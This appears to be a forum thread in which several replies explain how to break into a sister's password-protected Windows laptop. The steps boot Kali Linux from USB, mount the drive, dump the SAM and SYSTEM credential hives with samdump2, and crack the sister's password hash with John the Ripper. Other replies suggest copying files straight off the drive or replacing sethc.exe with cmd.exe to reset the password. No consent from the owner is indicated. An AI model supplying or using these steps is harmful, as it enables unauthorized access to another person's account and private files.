1) bios/Uefi is locked and boot order is not prioritizing usb boot before the windows drive

if you have ever installed linux this is extremely easy.

If you have never used linux you might have to do some research.

you can install a linux into a usb with UNetBootIn and choose Live CD, create a directory on the desktop and then open a terminal and type: sudo mount /dev/sdb1 and the directory and then just acces that directory to watch all the files

Download Kali on another machine (you'll have to know if your sisters laptop is 32bit or 64bit)

Throw it on a USB stick using the directions on the site.

Boot off the USB stick then something like:

mkdir /mnt/win
mount -t ntfs /dev/sda2 /mnt/win
cd /mnt/win/Windows/System32/config
samdump2 SYSTEM SAM > /root/pass1

Then us this to find yer sisters account name:
cat /root/pass1

Then use this to extract just that key:
cat /root/pass1 | grep Sister > /root/pass2

Then use John the Ripper to pop the password:
./john -f:NT /root/pass2

Reboot.
Try it.

it's not even necessary to bypass the password... with the right boot cd (e.g. linux with ntfs support) there's access to the drive and any files can be copied to an usb drive

try entering safemode
go into her maine hard drive
find a file called windows
find system 32
find a program called sethc
change its name to sethc0
find cmd
copy it and name the copy sethc
press shift 5 times
enter "net user*" (or "*net user", cant recall)
type user name and the new password for that user
